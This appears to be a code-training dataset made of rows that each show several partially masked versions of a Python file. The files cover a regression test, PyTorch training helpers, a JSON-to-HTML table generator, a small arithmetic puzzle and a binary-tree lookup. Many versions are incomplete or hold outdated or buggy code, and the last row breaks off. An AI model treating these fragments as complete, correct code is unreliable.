copyfile(serial_filename(), temp_filename)
serial_output_code.serial_output_code()
with open(serial_filename(), 'rb') as f:
qmc_out = pickle.load(f)
with open(temp_filename, 'rb') as f:
old_out = pickle.load(f)
finally:
copyfile(temp_filename, serial_filename())
remove(temp_filename)
assert qmc_out[0] == old_out[0]
print(len(qmc_out))
print(len(old_out))
assert len(qmc_out) == len(old_out) + 1
for ii in range(1, len(old_out)):
assert len(old_out[ii]) == len(qmc_out[ii])
for jj in range(len(qmc_out[1])):
assert np.all(np.isclose(qmc_out[ii][jj], old_out[ii][jj]))
| import pickle
from generation_code import serial_filename
import serial_output_code
import numpy as np
from shutil import copyfile
from os import remove
# This file is only temporary, mostly to be used when updating the
# reference output from a regression test, to ensure that, in all
# aspects that are in common with the previosu regression test, the new
# solution is the same.
# It is largely the same as test_serial_code.py
temp_filename = 'temp.pickle'
try:
# Copy reference output to temporary location
copyfile(serial_filename(),temp_filename)
# Run serial code
serial_output_code.serial_output_code()
with open(serial_filename(),'rb') as f:
qmc_out = pickle.load(f)
with open(temp_filename,'rb') as f:
old_out = pickle.load(f)
finally:
# Copy reference output back
copyfile(temp_filename,serial_filename())
# Remove temporary file
remove(temp_filename)
assert qmc_out[0] == old_out[0] # should be a float
print(len(qmc_out))
print(len(old_out))
assert len(qmc_out) == (len(old_out) + 1) # Because we've added in a new output
for ii in range(1,len(old_out)):
assert(len(old_out[ii])==len(qmc_out[ii]))
for jj in range(len(qmc_out[1])):
# For some reason, the sizes of these variables (in
# bytes) aren't always the same. I've no idea why.
# Hence, this assertion is commented out.
#assert getsizeof(qmc_out[ii][jj]) == getsizeof(old_out[ii][jj])
#assert np.all(np.isclose(qmc_out[ii][jj],old_out[ii][jj]))
assert np.all(np.isclose(qmc_out[ii][jj],old_out[ii][jj]))
| [
0,
1,
2,
3,
4
] |
1,620 | be90dcb4bbb69053e9451479990e030cd4841e4a | #-*- coding: utf8 -*-
#credits to https://github.com/pytorch/examples/blob/master/imagenet/main.py
import shutil, time, logging
import torch
import torch.optim
import numpy as np
import visdom, copy
from datetime import datetime
from collections import defaultdict
from generic_models.yellowfin import YFOptimizer
logger = logging.getLogger('app')
logger.setLevel(logging.DEBUG)
class VisdomMonitor(object):
def __init__(self, prefix=None, server='http://localhost', port=8097):
self.__prefix = prefix or datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S')
self.__vis = visdom.Visdom(server=server, port=port)
self.__metrics = defaultdict(lambda :defaultdict(list))
self.__win_dict = {}
self.__opts = self._init_opts()
def _init_opts(self):
opts = dict(legend=['Train', 'Validate'])
return opts
def __add(self, name, value, type):
self.__metrics[type][name].append(value)
def _add_val_performance(self, name, value):
self.__add(name, value, type='val')
def _add_train_performance(self, name, value):
self.__add(name, value, type='train')
def add_performance(self, metric_name, train_value, val_value):
self._add_train_performance(metric_name, train_value )
self._add_val_performance(metric_name, val_value)
self.plot(metric_name)
def plot(self, metric_name):
current_win = self.__win_dict.get(metric_name, None)
train_values = self.__metrics['train'][metric_name]
val_values = self.__metrics['val'][metric_name]
epochs = max(len(train_values), len(val_values))
values_for_plot = np.column_stack((np.array(train_values), np.array(val_values)))
opts = copy.deepcopy(self.__opts)
opts.update(dict(title='%s\ntrain/val %s' % (self.__prefix, metric_name)))
win = self.__vis.line(Y=values_for_plot, X=np.arange(epochs), opts=opts, win=current_win)
if current_win is None:
self.__win_dict[metric_name] = win
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def adjust_learning_rate_by_schedule(config, optimizer, epoch, decrease_rate=0.1):
"""Sets the learning rate to the initial LR decayed by 1/decrease_rate every 10 epochs"""
if not isinstance(optimizer, torch.optim.SGD):
return
#lr = config.lr * (0.1 ** (epoch // 10))
if epoch and epoch % 10 == 0:
for i, param_group in enumerate(optimizer.param_groups):
param_group['lr'] *= decrease_rate
logger.info('Setting learning layer=i, rate=%.6f', i, param_group['lr'])
class PlateauScheduler(object):
"""Sets the lr to the initial LR decayed by 1/decrease_rate, when not improving for max_stops epochs"""
def __init__(self, optimizer, patience, early_stop_n, decrease_rate=0.1, eps=1e-5,
warm_up_epochs=None, best_score=None):
self.optimizer = optimizer
if not isinstance(optimizer, (torch.optim.SGD, YFOptimizer)):
raise TypeError
self.patience = patience
self.early_stop_n = early_stop_n
self.decrease_rate = decrease_rate
self.eps = eps
self.warm_up_epochs = warm_up_epochs
self.__lr_changed = 0
self.__early_stop_counter = 0
self.__best_score = best_score
self.__descrease_times = 0
self.__warm_up = self.__has_warm_up(optimizer)
def __has_warm_up(self, optimizer):
for param_group in self.optimizer.param_groups:
if param_group['lr'] != param_group['after_warmup_lr']:
logger.info('Optimizer has warm-up stage')
return True
def step(self, epoch, score):
adjusted, to_break = False, False
prev_best_score = self.__best_score or -1
is_best = self.__best_score is None or score < self.__best_score - self.eps
self.__best_score = self.__best_score is not None and min(score, self.__best_score) or score
if is_best:
logger.info('Current model is best by val score %.5f < %.5f' % (self.__best_score, prev_best_score))
self.__early_stop_counter = 0
else:
self.__early_stop_counter += 1
if self.__early_stop_counter >= self.early_stop_n:
logger.info('Early stopping, regress for %d iterations', self.__early_stop_counter)
to_break = True
logger.info('early_stop_counter: %d', self.__early_stop_counter)
if (self.warm_up_epochs and self.__descrease_times == 0 and self.__warm_up and epoch >= self.warm_up_epochs - 1 ) or \
(self.__lr_changed <= epoch - self.patience and \
(self.__early_stop_counter is not None and self.patience and self.__early_stop_counter >= self.patience)):
self.__lr_changed = epoch
for param_group in self.optimizer.param_groups:
if self.__descrease_times == 0 and self.__warm_up:
param_group['lr'] = param_group['after_warmup_lr']
else:
param_group['lr'] = param_group['lr'] * self.decrease_rate
logger.info('Setting for group learning rate=%.8f, epoch=%d', param_group['lr'], self.__lr_changed)
adjusted = True
self.__descrease_times += 1
return adjusted, to_break, is_best
def init_optimizer(model, config, exact_layers=None):
"""param 'exact_layers' specifies which parameters of the model to train, None - all,
else - list of layers with a multiplier (optional) for LR schedule"""
opt_type = config.optimizer
if exact_layers:
logger.info('Learning exact layers, number=%d', len(exact_layers))
parameters = []
for i, layer in enumerate(exact_layers):
if isinstance(layer, tuple) and len(layer) == 2:
layer, multiplier = layer
init_multiplier = 1
elif isinstance(layer, tuple) and len(layer) == 3:
layer, init_multiplier, multiplier = layer
else:
multiplier = 1
init_multiplier = 1
lr = config.lr * multiplier
init_lr = config.lr * multiplier * init_multiplier
logger.info('Layer=%d, lr=%.5f', i, init_lr)
parameters.append({'params': layer.parameters(), 'lr': init_lr, 'after_warmup_lr': lr})
else:
logger.info('Optimizing all parameters, lr=%.5f', config.lr)
parameters = model.parameters()
if opt_type == 'sgd':
optimizer = torch.optim.SGD(parameters, config.lr, momentum=config.momentum, weight_decay=config.weight_decay)
elif opt_type == 'adam':
optimizer = torch.optim.Adam(parameters, lr=config.lr, weight_decay=config.weight_decay)
elif opt_type == 'yf':
optimizer = YFOptimizer(parameters, config.lr, mu=config.momentum, weight_decay=config.weight_decay,
clip_thresh=0.1)
else:
raise TypeError, 'Unknown optimizer type=%s' % (opt_type, )
return optimizer
def save_checkpoint(state, epoch, is_best, filename, best_filename):
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, best_filename)
shutil.copyfile(filename, best_filename + '-%d' % epoch)
def load_checkpoint(filename):
checkpoint = torch.load(filename)
return checkpoint
def train(train_loader, model, criterion, optimizer, epoch, is_multi_fc=False):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
predictions = AverageMeter()
# switch to train mode
model.train()
end = time.time()
for i, (input, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
target = target.cuda(async=True)
input_var = torch.autograd.Variable(input)
target_var = torch.autograd.Variable(target)
# compute output
if is_multi_fc==False:
# this is original loss function
output = model(input_var)
loss = criterion(output, target_var)
else:
# this is for inception_v3 with 2 output channels
# https://github.com/pytorch/vision/issues/302
output, output_aux = model(input_var)
loss = criterion(output, target_var)
loss+= criterion(output_aux, target_var)
# measure accuracy and record loss
losses.update(loss.data[0], input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if (i and i % 50 == 0) or i == len(train_loader) - 1:
logger.info('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Accuracy {acc.val:.4f} ({acc.avg:.4f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'.format(
epoch, i, len(train_loader), batch_time=batch_time,
data_time=data_time, loss=losses, acc=predictions))
return losses.avg
def compute_f2(output, target):
true_and_pred = target * output
ttp_sum = torch.sum(true_and_pred, 1)
tpred_sum = torch.sum(output, 1)
ttrue_sum = torch.sum(target, 1)
tprecision = ttp_sum / tpred_sum
trecall = ttp_sum / ttrue_sum
f2 = ((1 + 4) * tprecision * trecall) / (4 * tprecision + trecall)
return f2
def validate(val_loader, model, criterion, activation=torch.sigmoid):
logger.info('Validating model')
batch_time = AverageMeter()
losses = AverageMeter()
f2s = AverageMeter()
# switch to evaluate mode
model.eval()
end = time.time()
for i, (input, target) in enumerate(val_loader):
target = target.cuda(async=True)
input_var = torch.autograd.Variable(input, volatile=True)
target_var = torch.autograd.Variable(target, volatile=True)
# compute output
output = model(input_var)
loss = criterion(output, target_var)
# compute f2
f2 = compute_f2(activation(output), target_var).mean()
f2s.update(f2.data[0], input.size(0))
# measure accuracy and record loss
losses.update(loss.data[0], input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
logger.info('Test: [{0}/{0}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.avg:.5f}\t'
'F2: {f2s.avg}\t'.format(
len(val_loader), batch_time=batch_time, loss=losses, f2s=f2s))
return losses.avg
def get_outputs(loader, model, activation):
model.eval()
outputs, targets = [], []
for i, (input, target) in enumerate(loader):
input_var = torch.autograd.Variable(input, volatile=True)
output = model(input_var)
if activation is not None:
output = activation(output)
outputs.extend(output.cpu().data)
targets.extend(target)
return outputs, targets
def test_model(test_loader, model, activation=None):
logger.info('Testing')
model.eval()
names, results = [], []
for i, (input, name_batch) in enumerate(test_loader):
input_var = torch.autograd.Variable(input, volatile=True)
output = model(input_var)
if activation is not None:
output = activation(output)
names.extend(name_batch)
results.extend(output.cpu())
if i and i % 20 == 0:
logger.info('Batch %d',i)
return names, results
| null | null | null | null | [
0
] |
1,621 | d6e836140b1f9c955711402111dc07e74b4a23b1 | <mask token>
def jsons_to_table(dir_jsons, dir_out, name, format='html'):
"""
Extracts the informations stored in the JSON files and stores creates an HTML-table for them.
:param dir_jsons: directory of JSON files
:param dir_out: output directory of the HTML-table
:param name: name of the HTML page
"""
dir_out = sanity_util.safe_dir_path(dir_path=dir_out)
file_name = sanity_util.unique_file_name(dir=dir_out, fn=name, suffix=
'.{}'.format(format))
p_files = sorted([os.path.join(dir_jsons, p_json) for p_json in os.
listdir(dir_jsons)])
table = defaultdict(list)
keys = set()
for p_f in p_files:
if p_f.lower().endswith('.json'):
with open(p_f, 'r') as f_json:
el = json.load(f_json)
for k in el.keys():
keys.add(k)
for p_f in p_files:
if p_f.lower().endswith('.json'):
with open(p_f, 'r') as f_json:
el = json.load(f_json)
for k in el.keys():
table[k].append(el[k])
for k in keys.difference(set(el.keys())):
table[k].append(None)
df = pd.DataFrame.from_dict(table)
if format == 'html':
table_str = df.to_html()
else:
table_str = df.to_latex()
table_str += '<script type="text/javascript" src="stylize.js"></script>'
stylize_js = js_stylize()
with open(os.path.join(dir_out, 'stylize.js'), 'w') as f_js:
f_js.write(stylize_js)
with open(file_name, 'w') as f_out:
f_out.write(table_str)
def js_stylize():
return """
/**
* small script to stylize raw html tables
* @author Maximilian Springenberg <[email protected]>
*/
/**
* adding all bootstrap relevent dependencies to the headder
*/
function add_bootsrap(){
document.head.innerHTML +=
"<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
" +
"<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.0/jquery.min.js"></script>
" +
"<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
" +
"<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>";
}
/**
* setting classnames of a specific tag
*/
function style_tag(tagName, className){
tags = document.getElementsByTagName(tagName);
for(let i=0; i<tags.length; ++i){
tags[i].className = className;
}
}
/**
* setting the (Bootstrap) contenteditable flag for a specific tag
*/
function editable_tag(tagName, editable){
tags = document.getElementsByTagName(tagName);
for(let i=0; i<tags.length; ++i){
tags[i].setAttribute('contenteditable', editable);
}
}
// setting title
document.title = 'PHOCNet Table';
// adding bootstrap
add_bootsrap();
// stylize tables
style_tag('table', 'table table-responsive-md');
style_tag('thead', 'thead-dark');
// enable editable table-divisions
editable_tag('td', 'true');
"""
def parser():
"""
Creates a parser of this script.
:return: args-parser with the following arguments
Positional:
=============== ======================================================
arg semantic
=============== ======================================================
dir_jsons directory of JSON files
dir_out the directory to safe the HTML page to
file_name name of the HTML file
=============== ======================================================
"""
parser = ArgumentParser()
parser.add_argument('dir_jsons', help='dir containing json files')
parser.add_argument('dir_out', help='output directory')
parser.add_argument('file_name', help='name of HTML file')
return parser
<mask token>
| <mask token>
sys.path.append(SRC_DIR)
sys.path.append(FILE_DIR)
<mask token>
def jsons_to_table(dir_jsons, dir_out, name, format='html'):
"""
Extracts the informations stored in the JSON files and stores creates an HTML-table for them.
:param dir_jsons: directory of JSON files
:param dir_out: output directory of the HTML-table
:param name: name of the HTML page
"""
dir_out = sanity_util.safe_dir_path(dir_path=dir_out)
file_name = sanity_util.unique_file_name(dir=dir_out, fn=name, suffix=
'.{}'.format(format))
p_files = sorted([os.path.join(dir_jsons, p_json) for p_json in os.
listdir(dir_jsons)])
table = defaultdict(list)
keys = set()
for p_f in p_files:
if p_f.lower().endswith('.json'):
with open(p_f, 'r') as f_json:
el = json.load(f_json)
for k in el.keys():
keys.add(k)
for p_f in p_files:
if p_f.lower().endswith('.json'):
with open(p_f, 'r') as f_json:
el = json.load(f_json)
for k in el.keys():
table[k].append(el[k])
for k in keys.difference(set(el.keys())):
table[k].append(None)
df = pd.DataFrame.from_dict(table)
if format == 'html':
table_str = df.to_html()
else:
table_str = df.to_latex()
table_str += '<script type="text/javascript" src="stylize.js"></script>'
stylize_js = js_stylize()
with open(os.path.join(dir_out, 'stylize.js'), 'w') as f_js:
f_js.write(stylize_js)
with open(file_name, 'w') as f_out:
f_out.write(table_str)
def js_stylize():
return """
/**
* small script to stylize raw html tables
* @author Maximilian Springenberg <[email protected]>
*/
/**
* adding all bootstrap relevent dependencies to the headder
*/
function add_bootsrap(){
document.head.innerHTML +=
"<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
" +
"<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.0/jquery.min.js"></script>
" +
"<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
" +
"<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>";
}
/**
* setting classnames of a specific tag
*/
function style_tag(tagName, className){
tags = document.getElementsByTagName(tagName);
for(let i=0; i<tags.length; ++i){
tags[i].className = className;
}
}
/**
* setting the (Bootstrap) contenteditable flag for a specific tag
*/
function editable_tag(tagName, editable){
tags = document.getElementsByTagName(tagName);
for(let i=0; i<tags.length; ++i){
tags[i].setAttribute('contenteditable', editable);
}
}
// setting title
document.title = 'PHOCNet Table';
// adding bootstrap
add_bootsrap();
// stylize tables
style_tag('table', 'table table-responsive-md');
style_tag('thead', 'thead-dark');
// enable editable table-divisions
editable_tag('td', 'true');
"""
def parser():
"""
Creates a parser of this script.
:return: args-parser with the following arguments
Positional:
=============== ======================================================
arg semantic
=============== ======================================================
dir_jsons directory of JSON files
dir_out the directory to safe the HTML page to
file_name name of the HTML file
=============== ======================================================
"""
parser = ArgumentParser()
parser.add_argument('dir_jsons', help='dir containing json files')
parser.add_argument('dir_out', help='output directory')
parser.add_argument('file_name', help='name of HTML file')
return parser
if __name__ == '__main__':
arg_parser = parser()
args = vars(arg_parser.parse_args())
jsons_to_table(dir_jsons=args['dir_jsons'], dir_out=args['dir_out'],
name=args['name'], format='html')
| <mask token>
FILE_DIR = os.path.dirname(os.path.abspath(__file__))
SRC_DIR = os.path.dirname(os.path.join(FILE_DIR, '..', '..', ''))
sys.path.append(SRC_DIR)
sys.path.append(FILE_DIR)
<mask token>
def jsons_to_table(dir_jsons, dir_out, name, format='html'):
"""
Extracts the informations stored in the JSON files and stores creates an HTML-table for them.
:param dir_jsons: directory of JSON files
:param dir_out: output directory of the HTML-table
:param name: name of the HTML page
"""
dir_out = sanity_util.safe_dir_path(dir_path=dir_out)
file_name = sanity_util.unique_file_name(dir=dir_out, fn=name, suffix=
'.{}'.format(format))
p_files = sorted([os.path.join(dir_jsons, p_json) for p_json in os.
listdir(dir_jsons)])
table = defaultdict(list)
keys = set()
for p_f in p_files:
if p_f.lower().endswith('.json'):
with open(p_f, 'r') as f_json:
el = json.load(f_json)
for k in el.keys():
keys.add(k)
for p_f in p_files:
if p_f.lower().endswith('.json'):
with open(p_f, 'r') as f_json:
el = json.load(f_json)
for k in el.keys():
table[k].append(el[k])
for k in keys.difference(set(el.keys())):
table[k].append(None)
df = pd.DataFrame.from_dict(table)
if format == 'html':
table_str = df.to_html()
else:
table_str = df.to_latex()
table_str += '<script type="text/javascript" src="stylize.js"></script>'
stylize_js = js_stylize()
with open(os.path.join(dir_out, 'stylize.js'), 'w') as f_js:
f_js.write(stylize_js)
with open(file_name, 'w') as f_out:
f_out.write(table_str)
def js_stylize():
return """
/**
* small script to stylize raw html tables
* @author Maximilian Springenberg <[email protected]>
*/
/**
* adding all bootstrap relevent dependencies to the headder
*/
function add_bootsrap(){
document.head.innerHTML +=
"<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
" +
"<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.0/jquery.min.js"></script>
" +
"<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
" +
"<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>";
}
/**
* setting classnames of a specific tag
*/
function style_tag(tagName, className){
tags = document.getElementsByTagName(tagName);
for(let i=0; i<tags.length; ++i){
tags[i].className = className;
}
}
/**
* setting the (Bootstrap) contenteditable flag for a specific tag
*/
function editable_tag(tagName, editable){
tags = document.getElementsByTagName(tagName);
for(let i=0; i<tags.length; ++i){
tags[i].setAttribute('contenteditable', editable);
}
}
// setting title
document.title = 'PHOCNet Table';
// adding bootstrap
add_bootsrap();
// stylize tables
style_tag('table', 'table table-responsive-md');
style_tag('thead', 'thead-dark');
// enable editable table-divisions
editable_tag('td', 'true');
"""
def parser():
"""
Creates a parser of this script.
:return: args-parser with the following arguments
Positional:
=============== ======================================================
arg semantic
=============== ======================================================
dir_jsons directory of JSON files
dir_out the directory to safe the HTML page to
file_name name of the HTML file
=============== ======================================================
"""
parser = ArgumentParser()
parser.add_argument('dir_jsons', help='dir containing json files')
parser.add_argument('dir_out', help='output directory')
parser.add_argument('file_name', help='name of HTML file')
return parser
if __name__ == '__main__':
arg_parser = parser()
args = vars(arg_parser.parse_args())
jsons_to_table(dir_jsons=args['dir_jsons'], dir_out=args['dir_out'],
name=args['name'], format='html')
| <mask token>
from collections import defaultdict
from argparse import ArgumentParser
import os
import sys
import json
import pandas as pd
FILE_DIR = os.path.dirname(os.path.abspath(__file__))
SRC_DIR = os.path.dirname(os.path.join(FILE_DIR, '..', '..', ''))
sys.path.append(SRC_DIR)
sys.path.append(FILE_DIR)
from src.util import sanity_util
def jsons_to_table(dir_jsons, dir_out, name, format='html'):
"""
Extracts the informations stored in the JSON files and stores creates an HTML-table for them.
:param dir_jsons: directory of JSON files
:param dir_out: output directory of the HTML-table
:param name: name of the HTML page
"""
dir_out = sanity_util.safe_dir_path(dir_path=dir_out)
file_name = sanity_util.unique_file_name(dir=dir_out, fn=name, suffix=
'.{}'.format(format))
p_files = sorted([os.path.join(dir_jsons, p_json) for p_json in os.
listdir(dir_jsons)])
table = defaultdict(list)
keys = set()
for p_f in p_files:
if p_f.lower().endswith('.json'):
with open(p_f, 'r') as f_json:
el = json.load(f_json)
for k in el.keys():
keys.add(k)
for p_f in p_files:
if p_f.lower().endswith('.json'):
with open(p_f, 'r') as f_json:
el = json.load(f_json)
for k in el.keys():
table[k].append(el[k])
for k in keys.difference(set(el.keys())):
table[k].append(None)
df = pd.DataFrame.from_dict(table)
if format == 'html':
table_str = df.to_html()
else:
table_str = df.to_latex()
table_str += '<script type="text/javascript" src="stylize.js"></script>'
stylize_js = js_stylize()
with open(os.path.join(dir_out, 'stylize.js'), 'w') as f_js:
f_js.write(stylize_js)
with open(file_name, 'w') as f_out:
f_out.write(table_str)
def js_stylize():
return """
/**
* small script to stylize raw html tables
* @author Maximilian Springenberg <[email protected]>
*/
/**
* adding all bootstrap relevent dependencies to the headder
*/
function add_bootsrap(){
document.head.innerHTML +=
"<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
" +
"<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.0/jquery.min.js"></script>
" +
"<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
" +
"<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>";
}
/**
* setting classnames of a specific tag
*/
function style_tag(tagName, className){
tags = document.getElementsByTagName(tagName);
for(let i=0; i<tags.length; ++i){
tags[i].className = className;
}
}
/**
* setting the (Bootstrap) contenteditable flag for a specific tag
*/
function editable_tag(tagName, editable){
tags = document.getElementsByTagName(tagName);
for(let i=0; i<tags.length; ++i){
tags[i].setAttribute('contenteditable', editable);
}
}
// setting title
document.title = 'PHOCNet Table';
// adding bootstrap
add_bootsrap();
// stylize tables
style_tag('table', 'table table-responsive-md');
style_tag('thead', 'thead-dark');
// enable editable table-divisions
editable_tag('td', 'true');
"""
def parser():
"""
Creates a parser of this script.
:return: args-parser with the following arguments
Positional:
=============== ======================================================
arg semantic
=============== ======================================================
dir_jsons directory of JSON files
dir_out the directory to safe the HTML page to
file_name name of the HTML file
=============== ======================================================
"""
parser = ArgumentParser()
parser.add_argument('dir_jsons', help='dir containing json files')
parser.add_argument('dir_out', help='output directory')
parser.add_argument('file_name', help='name of HTML file')
return parser
if __name__ == '__main__':
arg_parser = parser()
args = vars(arg_parser.parse_args())
jsons_to_table(dir_jsons=args['dir_jsons'], dir_out=args['dir_out'],
name=args['name'], format='html')
| """
This module provides a script to extract data from all JSON files stored in a specific directory and create a HTML
table for an better overview of the data.
.. moduleauthor:: Maximilian Springenberg <[email protected]>
|
"""
from collections import defaultdict
from argparse import ArgumentParser
import os
import sys
import json
import pandas as pd
FILE_DIR = os.path.dirname(os.path.abspath(__file__))
SRC_DIR = os.path.dirname(os.path.join(FILE_DIR, '..', '..', ''))
sys.path.append(SRC_DIR)
sys.path.append(FILE_DIR)
from src.util import sanity_util
def jsons_to_table(dir_jsons, dir_out, name, format='html'):
"""
Extracts the informations stored in the JSON files and stores creates an HTML-table for them.
:param dir_jsons: directory of JSON files
:param dir_out: output directory of the HTML-table
:param name: name of the HTML page
"""
# sanity of paths
dir_out = sanity_util.safe_dir_path(dir_path=dir_out)
file_name = sanity_util.unique_file_name(dir=dir_out, fn=name, suffix='.{}'.format(format))
# reading JSON files
p_files = sorted([os.path.join(dir_jsons, p_json) for p_json in os.listdir(dir_jsons)])
table = defaultdict(list)
keys = set()
for p_f in p_files:
if p_f.lower().endswith('.json'):
with open(p_f, 'r') as f_json:
el = json.load(f_json)
for k in el.keys():
keys.add(k)
for p_f in p_files:
if p_f.lower().endswith('.json'):
with open(p_f, 'r') as f_json:
el = json.load(f_json)
for k in el.keys():
table[k].append(el[k])
for k in keys.difference(set(el.keys())):
table[k].append(None)
# DataFrame conversion
df = pd.DataFrame.from_dict(table)
# writing HTML table
if format == 'html':
table_str = df.to_html()
else:
table_str = df.to_latex()
table_str += '<script type="text/javascript" src="stylize.js"></script>'
stylize_js = js_stylize()
with open(os.path.join(dir_out, 'stylize.js'), 'w') as f_js:
f_js.write(stylize_js)
with open(file_name, 'w') as f_out:
f_out.write(table_str)
def js_stylize():
return '''
/**
* small script to stylize raw html tables
* @author Maximilian Springenberg <[email protected]>
*/
/**
* adding all bootstrap relevent dependencies to the headder
*/
function add_bootsrap(){
document.head.innerHTML +=
"<link rel=\"stylesheet\" href=\"https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css\">\n" +
"<script src=\"https://ajax.googleapis.com/ajax/libs/jquery/3.4.0/jquery.min.js\"></script>\n" +
"<script src=\"https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js\"></script>\n" +
"<script src=\"https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js\"></script>";
}
/**
* setting classnames of a specific tag
*/
function style_tag(tagName, className){
tags = document.getElementsByTagName(tagName);
for(let i=0; i<tags.length; ++i){
tags[i].className = className;
}
}
/**
* setting the (Bootstrap) contenteditable flag for a specific tag
*/
function editable_tag(tagName, editable){
tags = document.getElementsByTagName(tagName);
for(let i=0; i<tags.length; ++i){
tags[i].setAttribute('contenteditable', editable);
}
}
// setting title
document.title = 'PHOCNet Table';
// adding bootstrap
add_bootsrap();
// stylize tables
style_tag('table', 'table table-responsive-md');
style_tag('thead', 'thead-dark');
// enable editable table-divisions
editable_tag('td', 'true');
'''
def parser():
"""
Creates a parser of this script.
:return: args-parser with the following arguments
Positional:
=============== ======================================================
arg semantic
=============== ======================================================
dir_jsons directory of JSON files
dir_out the directory to safe the HTML page to
file_name name of the HTML file
=============== ======================================================
"""
parser = ArgumentParser()
parser.add_argument('dir_jsons', help='dir containing json files')
parser.add_argument('dir_out', help='output directory')
parser.add_argument('file_name', help='name of HTML file')
return parser
if __name__ == '__main__':
arg_parser = parser()
args = vars(arg_parser.parse_args())
jsons_to_table(dir_jsons=args['dir_jsons'], dir_out=args['dir_out'], name=args['name'], format='html')
| [
3,
4,
5,
6,
7
] |
1,622 | 74939f81e999b8e239eb64fa10b56f48c47f7d94 | <mask token>
| <mask token>
if w < 2 or w % 2 != 0 or w <= v:
print('INVALID INPUT')
else:
x = (4 * v - w) // 2
print('TW={0} FW={1}'.format(x, v - x))
| v = int(input())
w = int(input())
if w < 2 or w % 2 != 0 or w <= v:
print('INVALID INPUT')
else:
x = (4 * v - w) // 2
print('TW={0} FW={1}'.format(x, v - x))
| # Problem Statement – An automobile company manufactures both a two wheeler (TW) and a four wheeler (FW). A company manager wants to make the production of both types of vehicle according to the given data below:
# 1st data, Total number of vehicle (two-wheeler + four-wheeler)=v
# 2nd data, Total number of wheels = W
# The task is to find how many two-wheelers as well as four-wheelers need to manufacture as per the given data.
# Example :
# Input :
# 200 -> Value of V
# 540 -> Value of W
# Output :
# TW =130 FW=70
v=int(input())
w=int(input())
if (w<2 or w%2!=0 or w<=v):
print("INVALID INPUT")
else:
x=((4*v)-w)//2
print("TW={0} FW={1}".format(x,v-x))
| null | [
0,
1,
2,
3
] |
1,623 | b9675bc65e06624c7f039188379b76da8e58fb19 | <mask token>
def findKthNode(root, k):
if not root:
return None
if root.number < k or k <= 0:
return None
if k == 1:
return root
if root.left and root.left.number >= k - 1:
return findKthNode(root.left, k - 1)
else:
res = 1 if not root.left else root.left.number + 1
return findKthNode(root.right, k - res)
<mask token>
| <mask token>
def findKthNode(root, k):
if not root:
return None
if root.number < k or k <= 0:
return None
if k == 1:
return root
if root.left and root.left.number >= k - 1:
return findKthNode(root.left, k - 1)
else:
res = 1 if not root.left else root.left.number + 1
return findKthNode(root.right, k - res)
<mask token>
if node:
print(node.n)
| <mask token>
def findKthNode(root, k):
if not root:
return None
if root.number < k or k <= 0:
return None
if k == 1:
return root
if root.left and root.left.number >= k - 1:
return findKthNode(root.left, k - 1)
else:
res = 1 if not root.left else root.left.number + 1
return findKthNode(root.right, k - res)
root = testTree
node = findKthNode(root, 3)
if node:
print(node.n)
| from tree import *
def findKthNode(root, k):
if not root:
return None
if root.number < k or k <= 0:
return None
if k == 1:
return root
if root.left and root.left.number >= k - 1:
return findKthNode(root.left, k - 1)
else:
res = 1 if not root.left else root.left.number + 1
return findKthNode(root.right, k - res)
root = testTree
node = findKthNode(root, 3)
if node:
print(node.n)
| #!/usr/bin/env python
# encoding: utf-8
from tree import *
def findKthNode(root, k):
if not root:
return None
if root.number < k or k <= 0:
return None
if k == 1:
return root
if root.left and root.left.number >= k-1:
return findKthNode(root.left, k - 1)
else:
res = 1 if not root.left else root.left.number + 1
return findKthNode(root.right, k -res)
root = testTree
node = findKthNode(root, 3)
if node:
print(node.n)
| [
1,
2,
3,
4,
5
] |
1,624 | 53de53614b3c503a4232c00e8f2fd5a0f4cb6615 | <mask token>
| <mask token>
if __name__ == '__main__':
req = 'https://jsonplaceholder.typicode.com/todos'
response = requests.get(req).json()
d = {}
req_user = 'https://jsonplaceholder.typicode.com/users'
users = requests.get(req_user).json()
for user in users:
